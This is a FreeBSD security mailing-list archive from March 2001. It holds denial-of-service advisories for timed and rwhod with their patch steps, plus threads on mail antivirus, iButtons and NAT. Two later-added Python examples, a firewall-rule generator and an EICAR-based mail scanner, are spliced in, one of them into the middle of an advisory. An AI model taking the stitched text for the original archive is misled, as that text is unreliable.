to this problem, if they have been configued to run timed. It was corrected prior to the forthcoming release of FreeBSD 4.3. III. Impact Remote users can cause the timed daemon to crash, denying service to clients. IV. Workaround Implement packet filtering at perimeter firewalls or on the local machine using ipfw(8)/ipf(8) to prevent untrusted users from connecting to the timed service. The timed daemon listens on UDP port 525 by default. V. Solution Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the respective correction dates. 
To patch your present system: download the relevant patch from the below location, and execute the following commands as root:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch.asc

This patch has been verified to apply to FreeBSD 4.2-RELEASE and FreeBSD 3.5.1-RELEASE. It may or may not apply to older releases.

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/timed/timed
# patch -p < /path/to/patch
# make depend && make all install

Kill and restart timed to cause the changes to take effect. If you have started timed with non-standard options (e.g. by setting timed_flags in /etc/rc.conf) then the below command will need to be modified appropriately.

# killall -KILL timed
# /usr/sbin/timed

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1emVUuHi5z0oilAQEYEwP/cPNMQO7LjlEs2/MyxJwVKpQLRzmprJjQ
i2QpXEvkZgXSxAcIh15jNsR1TPwUnzCRWHZ5touw0DxTbTbMsnzRVx0/P5jGmQCT
6n5Z11puyEg336zET+tGhVnEt9Ybm7Z/h7Et+njVRTVqbe2AtpFeSbI5NXlZCgs6
ZUYxdLUhfPM=
=Dw88
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 12 15:48:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2EFDA37B718; Mon, 12 Mar 2001 15:47:59 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNlxe28107; Mon, 12 Mar 2001 15:47:59 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 12 Mar 2001 15:47:59 -0800 (PST) Message-Id: <200103122347.f2CNlxe28107@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From:
FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:29.rwhod Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:29                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          rwhod allows remote denial of service

Category:       core
Module:         rwhod
Announced:      2001-03-12
Credits:        Mark Huizer
Affects:        All released versions of FreeBSD 3.x, 4.x.
                FreeBSD 3.5-STABLE prior to the correction date.
                FreeBSD 4.2-STABLE prior to the correction date.
Corrected:      2000-12-23 (FreeBSD 3.5-STABLE)
                2000-12-22 (FreeBSD 4.2-STABLE)
FreeBSD only:   NO

I.   Background

rwhod(8) is a server which implements the rwho protocol, which communicates information on system uptime and logged-in users between machines on a network.

II.  Problem Description

Malformed packets sent to the rwhod daemon could cause it to crash, thereby denying service to clients if rwhod is not run under a watchdog process which causes it to automatically restart in the event of a failure. The rwhod daemon is not run in this way in the default invocation from /etc/rc.conf using the rwhod_enable variable.

All versions of FreeBSD 3.x and 4.x prior to the correction date including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this problem, if they have been configured to run rwhod (this is not enabled by default).

III. Impact

Remote users can cause the rwhod daemon to crash, denying service to clients.

IV.  Workaround

Implement packet filtering at perimeter firewalls or on the local machine using ipfw(8)/ipf(8) to prevent untrusted users from connecting to the rwhod service. The rwhod daemon listens on UDP port 513 by default.

V.   Solution

Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the respective correction dates.
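Both advisories above (SA-01:28 and SA-01:29) share one precondition, that the daemon is only reachable if /etc/rc.conf enables it, and one workaround, filtering its UDP port (525 for timed, 513 for rwhod). What follows is an added example for this archive page, not code from the advisories or from the FreeBSD tree: it parses rc.conf-style text the way sh would (quotes stripped, '#' comments, a later assignment wins), reports which of the two daemons are enabled and with which flags, and renders the workaround as ipfw(8) rules that admit the service from a trusted network and deny it from everyone else. The sample rc.conf, the trusted network 192.0.2.0/24 and the rule numbers are assumptions for the demonstration.

```python
"""Audit an rc.conf for the daemons covered by FreeBSD-SA-01:28 (timed) and
FreeBSD-SA-01:29 (rwhod) and emit the ipfw rules the advisories give as the
workaround.

Added example for this archive page; not code from the advisories or from
FreeBSD. The rc.conf text, trusted network and rule numbers are assumptions."""
import re
import shlex

# From the advisories: rc.conf knob -> (daemon, UDP port it listens on, advisory).
ADVISED = {
    "timed_enable": ("timed", 525, "FreeBSD-SA-01:28"),
    "rwhod_enable": ("rwhod", 513, "FreeBSD-SA-01:29"),
}

_ASSIGN = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$")


def parse_rc_conf(text):
    """Return the effective variable values of rc.conf-style text.

    rc.conf is sourced by sh, so quotes are stripped, '#' starts a comment and a
    later assignment overrides an earlier one; shlex reproduces that tokenizing."""
    values = {}
    for line in text.splitlines():
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:
            continue  # unbalanced quote: sh would choke here too; do not guess
        for tok in tokens:
            m = _ASSIGN.match(tok)
            if m:
                values[m.group(1)] = m.group(2)
    return values


def exposed_services(values):
    """List (daemon, port, advisory, flags) for each advised daemon rc.conf turns on.

    The 4.x rc scripts start a daemon when its *_enable knob matches YES
    case-insensitively, so the same test is applied here."""
    found = []
    for knob, (daemon, port, advisory) in ADVISED.items():
        if values.get(knob, "NO").upper() == "YES":
            found.append((daemon, port, advisory, values.get(daemon + "_flags", "")))
    return sorted(found)


def ipfw_workaround(exposed, trusted_nets=(), first_rule=1000):
    """Render the advisories' workaround as ipfw(8) rules: admit the service from
    the trusted networks only, then deny it from everyone else.

    Rule numbers are an assumption; ipfw acts on the first matching rule, so these
    must sort before any existing rule that admits UDP broadly."""
    rules = []
    num = first_rule
    for daemon, port, advisory, _flags in exposed:
        for net in trusted_nets:
            rules.append(f"ipfw add {num} allow udp from {net} to any {port} in  # {advisory} {daemon}")
            num += 1
        rules.append(f"ipfw add {num} deny udp from any to any {port} in  # {advisory} {daemon}")
        num += 1
    return rules


# Constructed /etc/rc.conf for the demonstration; not from any real host.
SAMPLE_RC_CONF = """\
hostname="bastion.example.net"
sendmail_enable="YES"
timed_enable="NO"
timed_enable="yes"      # later assignment wins, as it does when sh sources the file
timed_flags="-M"
rwhod_enable="YES"
ntpdate_enable="YES"
"""

if __name__ == "__main__":
    exposed = exposed_services(parse_rc_conf(SAMPLE_RC_CONF))
    for daemon, port, advisory, flags in exposed:
        print(f"{advisory}: {daemon} enabled (flags {flags!r}), listening on UDP {port}")
    print("\n".join(ipfw_workaround(exposed, trusted_nets=("192.0.2.0/24",))))
```

Run it against a copy of /etc/rc.conf and review the output before loading it: rwhod in particular needs the allow rule for the LAN it exchanges broadcasts with, or the filter silences the service it was meant to protect. The signature check the advisory asks for is `gpg --verify timed.patch.asc timed.patch`, which only means something once the key the advisories are signed with has been imported and its fingerprint checked out of band.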
To patch your present system: download the relevant patch from the below location, and execute the following commands as root:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch.asc

This patch has been verified to apply to FreeBSD 4.2-RELEASE and FreeBSD 3.5.1-RELEASE. It may or may not apply to older releases.

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/rwhod
# patch -p < /path/to/patch
# make depend && make all install

Kill and restart rwhod to cause the changes to take effect. If you have started rwhod with non-standard options (e.g. by setting rwhod_flags in /etc/rc.conf) then the below command will need to be modified appropriately.

# killall -KILL rwhod
# /usr/sbin/rwhod

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1fmlUuHi5z0oilAQG05QP/bQpUXpXc+X3/k/jbqgxjNOXwfzYRwNph
trCjRBKDKZrBGvlS2mTSbyisn6Rcv5PhigVAmU7sllrrXmYDCuMjNoMQqIhRwMax
ojaklsg6F8rX3zNwUlaQp45ZYiJ9Zi34kkRRnZQ5oAFciS6I/3tYnP9t0Sedbbsi
V/na+hI/Gtk=
=TskQ
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 12 19: 5:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2096837B71A for ; Mon, 12 Mar 2001 19:05:14 -0800 (PST) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1999 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 12 Mar 2001 21:04:03 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 12 Mar 2001 21:04:02 -0600 (CST) From: James Wyatt To: Will Mitayai Keeso Rowe Cc: freebsd-security@freebsd.org Subject: Re: Virus Scanning
Software for FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I have an eval copy of a product that looks promising: Sophos antivirus.

http://www.sophos.com/products/antivirus/savunix.html

You can use the SAVI (API for virus checking) to scan email according to the description at:

http://www.sophos.com/products/antivirus/savi/

Their licensing looks fair and the sales person assigned to me has been politely helpful and not overly insistent. Everything I've looked at so far looks great, but the customer that wanted it has had delays and now wants to wait for FreeBSD 4.3-RELEASE to install things on their server.

Updates are monthly CDs and urgent updates are available as downloads.

Our intent is to have it go after SMTP, HTTP, and FTP if we can and to scan the Samba partitions for file infections. It handles uSoft Office products like Word(tm) docs and such.

Best of all, they support FreeBSD so we should support them, right? - Jy@

On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
>
> Regards,
> Mit
>
> --
> Will Mitayai Keeso Rowe
>
> For full contact information, please visit:
> http://my.infotriever.com/mitayai

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 12 20:34:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 0B67A37B71C for ; Mon, 12 Mar 2001 20:34:36 -0800 (PST) (envelope-from durham@w2xo.pgh.pa.us) Received: from shazam (shazam [192.168.5.3]) by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2D4XOq36759; Tue, 13 Mar 2001 04:33:24 GMT (envelope-from durham@w2xo.pgh.pa.us) Date: Mon, 12 Mar 2001 23:35:38 -0500 (EST) From: Jim Durham X-Sender: durham@shazam.int To: James Wyatt Cc: Will Mitayai Keeso Rowe , freebsd-security@FreeBSD.ORG Subject: Re: Virus Scanning Software for FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 12 Mar 2001, James Wyatt wrote:
> I have an eval copy of a product that looks promising: Sophos antivirus.
>
> http://www.sophos.com/products/antivirus/savunix.html
>
> You can use the SAVI (API for virus checking) to scan email according to
> the description at:
>
> http://www.sophos.com/products/antivirus/savi/
>
> Their licensing looks fair and the sales person assigned to me has been
> politely helpful and not overly insistent. Everything I've looked at so
> far looks great, but the customer that wanted it has had delays and now
> wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
>
> Updates are monthly CDs and urgent updates are available as downloads.
>
> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.
>
> Best of all, they support FreeBSD so we should support them, right? - Jy@
>
> On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> > Is anyone aware of any virus scanning solutions for freebsd, particularly
> > solutions for email? I don't trust my users not to follow proper email
> > guidelines, and thus would like to stop email at the server before they get
> > delivered the message.
>

I am using Sophos, and Amavis at our company. It is working very well. Sophos supports Windoze, Mac, Linux, FreeBSD, even VMS and OS2!

You have Sendmail call Amavis for all incoming mail. Amavis unpacks and scans all attachments, even zipped and rar'ed and so forth, then delivers the mail to the user's mailbox if it's OK. Otherwise, it mails either the originator of the virus mail and/or the administrator and saves the virus mail for perusal. Works very well, but you need a little horsepower on the server. Our company sends around huge Autocad drawings and Excel spreadsheets and they all have to be "unattached" and scanned.

I'm also using the Sophos Intercheck daemon. You put the Sophos CD in any workstation on your LAN, pick a directory on the server in which to install the Sophos setup stuff and Intercheck stuff. Then you install all the workstations (including the one you used to generate the server setup directory) from the server (running SAMBA of course!). Now, when a user logs into the M$ domain on Samba, any updates will be automatically downloaded to the workstation. I update several times daily from the Sophos site.

When Sophos is first run on the workstation, it builds a file list. Any time the list is modified, it refers it to the intercheck daemon on the server for virus sweeping. Of course, any e-mail attachment that was unpacked would be scanned immediately, as it wouldn't be on the "safe" list. Works well..
Jim Durham

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 12 21: 5:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp011.mail.yahoo.com (smtp011.mail.yahoo.com [216.136.173.31]) by hub.freebsd.org (Postfix) with SMTP id 2BCF337B719 for ; Mon, 12 Mar 2001 21:05:32 -0800 (PST) (envelope-from neve_ripe@yahoo.com) Received: from f2f.tsua.net (HELO never) (212.40.34.58) by smtp.mail.vip.sc5.yahoo.com with SMTP; 13 Mar 2001 05:05:31 -0000 X-Apparently-From: Date: Tue, 13 Mar 2001 07:05:24 +0200 From: Alexandr Kovalenko X-Mailer: The Bat! (v1.49) UNREG / CD5BF9353B3B7091 Reply-To: Alexandr Kovalenko Organization: UIC Group X-Priority: 3 (Normal) Message-ID: <060144903.20010313070524@yahoo.com> To: "Will Mitayai Keeso Rowe" Cc: freebsd-security@freebsd.org Subject: Re: Virus Scanning Software for FreeBSD In-reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hello Will,

Monday, March 12, 2001, 11:56:43 PM, you wrote:

WMKR> Is anyone aware of any virus scanning solutions for freebsd, particularly
WMKR> solutions for email? I don't trust my users not to follow proper email
WMKR> guidelines, and thus would like to stop email at the server before they get
WMKR> delivered the message.

There is antivirus software called AVP, it has versions for FreeBSD 4.x and 3.x. It has a good virus base (for now ~45000). It can be incorporated with sendmail too.

See http://www.kaspersky.com/ for details.

--
Best regards,
Alexandr mailto:neve_ripe@yahoo.com

_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 21:33:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from gull.prod.itd.earthlink.net (gull.prod.itd.earthlink.net [207.217.121.85]) by hub.freebsd.org (Postfix) with ESMTP id B5B1F37B718 for ; Mon, 12 Mar 2001 21:33:30 -0800 (PST) (envelope-from dhagan@colltech.com) Received: from colltech.com (1Cust6.tnt4.clarksburg.wv.da.uu.net [63.15.39.6]) by gull.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id VAA13553 for ; Mon, 12 Mar 2001 21:33:29 -0800 (PST) Message-ID: <3AADB1D3.C70E00C@colltech.com> Date: Tue, 13 Mar 2001 00:36:19 -0500 From: Daniel Hagan X-Mailer: Mozilla 4.73 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: iButton Development Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was some discussion regarding iButtons in mid-Jan on this list. I'm interested in getting one or more of these things to play with, with the goal of: o Authenticating myself to my home workstations (pam module?). o Storing PGP & ssh keys. Since I assume these are tasks of interest to more people than just myself, I was wondering: o Does anyone have existing code bases to support these tasks? o Is there any support (in the political sense) for getting the pam module and/or other code incorporated into the base system or as a port? o Does anyone have any recommendations on what hardware to procure for these tasks? I was looking at getting a serial port BlueDot (possibly two or three, I have some laptops I may want to use this with too) and a DS1996L-F5 64-kbit Memory iButton. 
I would also think about getting a Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood exactly what I'd be getting for the money. Does anyone have any information/examples on how these Java iButtons are used?

Thanks,
Daniel

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 12 22:34:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from server.mbg.com.ge (server.mbg.com.ge [212.72.131.237]) by hub.freebsd.org (Postfix) with SMTP id 8DB5C37B718 for ; Mon, 12 Mar 2001 22:34:03 -0800 (PST) (envelope-from nugzar@mbg.com.ge) Received: (qmail 10694 invoked from network); 13 Mar 2001 06:59:30 -0000 Received: from unknown (HELO nugzar) (192.168.170.152) by server.mbg.com.ge with SMTP; 13 Mar 2001 06:59:30 -0000 Date: Tue, 13 Mar 2001 10:34:00 +0400 From: Nugzar Nebieridze X-Mailer: The Bat! (v1.44) UNREG / CD5BF9353B3B7091 Reply-To: Nugzar Nebieridze X-Priority: 3 (Normal) Message-ID: <1363890484.20010313103400@mbg.com.ge> To: freebsd-security@freebsd.org Subject: Re[2]: Virus Scanning Software for FreeBSD In-reply-To: <060144903.20010313070524@yahoo.com> References: <060144903.20010313070524@yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hello Alexandr,

Tuesday, March 13, 2001, 9:05:24 AM, you wrote:

AK> Hello Will,
AK> Monday, March 12, 2001, 11:56:43 PM, you wrote:
WMKR>> Is anyone aware of any virus scanning solutions for freebsd, particularly
WMKR>> solutions for email? I don't trust my users not to follow proper email
WMKR>> guidelines, and thus would like to stop email at the server before they get
WMKR>> delivered the message.
AK> There is antivirus software called AVP, it has versions for FreeBSD
AK> 4.x and 3.x. It has a good virus base (for now ~45000). It can be
AK> incorporated with sendmail too.
AK> See http://www.kaspersky.com/ for details.

This company provides AntiVirus software for Windows, FreeBSD and Linux. If your server is heavily loaded then they are also providing a daemon AVP that loads its databases only once when you start it and then you can connect to its socket and pass data to check for viruses. It requires fewer computer resources. It is not free, but you can download a demo version that will be able to detect viruses only but not disinfect them...

Hope it helps.

Nugzar

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 12 22:52:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id BC4CF37B750 for ; Mon, 12 Mar 2001 22:52:13 -0800 (PST) (envelope-from meshko@daedalus.cs.brandeis.edu) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id BAA04636; Tue, 13 Mar 2001 01:51:57 -0500 Date: Tue, 13 Mar 2001 01:51:57 -0500 (EST) From: Mikhail Kruk To: Nugzar Nebieridze Cc: Subject: Re: Re[2]: Virus Scanning Software for FreeBSD In-Reply-To: <1363890484.20010313103400@mbg.com.ge> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> AK> See http://www.kaspersky.com/ for details.

...off-topic... but I remember the first antivirus made by this guy, Kaspersky... if I'm not mistaken, it was a MS DOS TSR program written in Pascal which monitored interrupt handlers, writes to MBR etc...
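Jim Durham's and Nugzar Nebieridze's messages in this thread describe the same shape of system: the MTA hands each message to a scanner, the scanner unpacks every attachment (archives included), asks an engine about each file, and the message is delivered or held on the result. The block below is an added example for this archive page, not Amavis, Sophos or AVP code: it implements that pipeline with a stand-in engine that matches the EICAR test string, bounds archive nesting and total unpacked size so a hostile attachment cannot exhaust the scanner, and is exercised on a constructed message carrying a zip inside a zip. The message, addresses, limits and detection name are assumptions.

```python
"""MTA-side scanning hook of the kind described in this thread: unpack every
attachment (including nested archives), hand each file to a scanner, and
deliver or quarantine the whole message on the result.

Added example for this archive page; not Amavis, Sophos or AVP code. The engine
is a plain signature match on the EICAR test string and the message is
constructed; limits and names are assumptions."""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

# The EICAR test string: every real engine detects it, so it is the standard way
# to exercise a scanning pipeline without a live sample.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

MAX_DEPTH = 4            # nested-archive limit (assumption): stops archive bombs
MAX_UNPACKED = 50 << 20  # 50 MiB of unpacked bytes per message (assumption)


def signature_scan(data):
    """Stand-in engine: return a detection name or None."""
    return "EICAR-Test-File" if EICAR in data else None


def unpack(name, data, depth=0, budget=None):
    """Yield (name, bytes) for data and, for zip archives, every member recursively.

    depth and budget bound the work so a hostile archive cannot exhaust the scanner;
    exceeding the budget raises ValueError rather than silently skipping content."""
    if budget is None:
        budget = [MAX_UNPACKED]
    yield name, data
    if depth >= MAX_DEPTH or not zipfile.is_zipfile(io.BytesIO(data)):
        return
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            budget[0] -= info.file_size
            if budget[0] < 0:
                raise ValueError("unpack budget exceeded at " + name + "/" + info.filename)
            yield from unpack(name + "/" + info.filename, zf.read(info), depth + 1, budget)


def scan_message(raw, engine=signature_scan):
    """Return (verdict, findings); verdict is 'deliver' or 'quarantine'.

    Every body part and attachment is unpacked and scanned; one hit holds the whole
    message, and so does an archive the scanner refuses to unpack."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    try:
        for part in msg.walk():
            if part.is_multipart():
                continue
            payload = part.get_payload(decode=True) or b""
            label = part.get_filename() or part.get_content_type()
            for name, data in unpack(label, payload):
                hit = engine(data)
                if hit:
                    findings.append((name, hit))
    except (ValueError, zipfile.BadZipFile) as exc:
        findings.append(("unpack", str(exc)))
    return ("quarantine" if findings else "deliver"), findings


def nest_in_zips(name, data, levels):
    """Wrap data in `levels` nested zip archives; the innermost member is `name`."""
    for i in range(levels):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(name, data)
        name, data = f"level{i}.zip", buf.getvalue()
    return data


def build_sample(infected):
    """Constructed message: a text body plus a zip-in-a-zip attachment whose
    innermost file is EICAR when infected, harmless bytes otherwise."""
    payload = EICAR if infected else b"MZ harmless program"
    msg = EmailMessage()
    msg["From"] = "sender@example.net"   # constructed addresses
    msg["To"] = "user@example.net"
    msg["Subject"] = "drawings"
    msg.set_content("see attached")
    msg.add_attachment(nest_in_zips("invoice.com", payload, 2),
                       maintype="application", subtype="zip", filename="drawings.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for flag in (True, False):
        print(scan_message(build_sample(flag)))
```

Archive members are scanned at every nesting level, and because small members are stored uncompressed the container bytes match the signature too, so the infected sample yields one finding per level; the last finding names the offending file. A deployment would replace signature_scan with a call into the engine's socket or API (the daemon interface Nugzar describes) and turn the verdict into a reject or a quarantine on the sendmail side.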
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 12 23: 4:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 33F7C37B718; Mon, 12 Mar 2001 23:04:48 -0800 (PST) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2D723N18585; Mon, 12 Mar 2001 23:02:03 -0800 (PST) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: "Bob Van Valzah" , "pW" Cc: , Subject: RE: Racoon Problem & Cisco Tunnel Date: Mon, 12 Mar 2001 23:02:03 -0800 Message-ID: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <3AACF40D.4080504@Talarian.Com> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
>Sent: Monday, March 12, 2001 8:07 AM
>To: pW
>Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
>Subject: Re: Racoon Problem & Cisco Tunnel
>
>
>Yes. The five DSL setups with which I'm familiar all grant at least one
>public address per house. I believe all are static, but one might be
>dynamic. Interference with protocols like IPSec is one of the reasons
>why I'd make a public address a requirement when choosing a DSL
>provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
>possible. Let's hasten the deployment of IPv6.
>

I'd agree with you if everyone that would have to do a renumber of a large network from IPv4 to IPv6 had Vint Cerf's money. When you're retired like him with money coming out your arse-hole you can afford to make irresponsible statements like that.

Unfortunately, what people like him don't understand is that the burden of renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely on people like me - who have thousands of customers and tens of thousands of public IP numbers spread out among all of them - and who don't have the money to support something this audacious. I can almost guarantee that whatever ISP that I am working for when this finally happens is going to go out of business, all it's going to do is put thousands of smaller to medium-sized ISPs into bankruptcy and let people like AOL who have money coming out their arse-holes virtually monopolize Internet access in the world.

Until I see the large organizations with Class A's tied up give up those numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6, and most other ISPs that are out there are going to fight it as well. In the meantime I'm pushing all my customers into using NAT. NAT is here to stay and people that run around calling it an aberration are just proving to the rest of us that they have absolutely no business sense.

NAT has proven itself reliable and vital and idiot engineers that design TCP protocols that assume everyone has a public IP number are just architecting their own failures, and their protocol's subsequent minimizing by the market. I have some sympathy for protocols like IPSec that came to be during the same time - but organizational-to-organizational IPSec tunnels don't have to pass through the NAT - they can terminate on it. But, anyone doing a new protocol today is a fool if it can't work through a NAT.
Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 5:27: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.86.136]) by hub.freebsd.org (Postfix) with ESMTP id CE27437B725 for ; Tue, 13 Mar 2001 05:26:59 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by phk.freebsd.dk (8.9.3/8.9.3) with ESMTP id OAA42540; Tue, 13 Mar 2001 14:26:57 +0100 (CET) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.1/8.11.1) with ESMTP id f2DDREp06942; Tue, 13 Mar 2001 14:27:15 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: Daniel Hagan Cc: freebsd-security@FreeBSD.ORG Subject: Re: iButton Development In-Reply-To: Your message of "Tue, 13 Mar 2001 00:36:19 EST." <3AADB1D3.C70E00C@colltech.com> Date: Tue, 13 Mar 2001 14:27:14 +0100 Message-ID: <6940.984490034@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes: >There was some discussion regarding iButtons in mid-Jan on this list. >I'm interested in getting one or more of these things to play with, with >the goal of: The best I can suggest you is that we rally all efforts around: http://anoncvs.aldigital.co.uk/iBLab/ -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. 
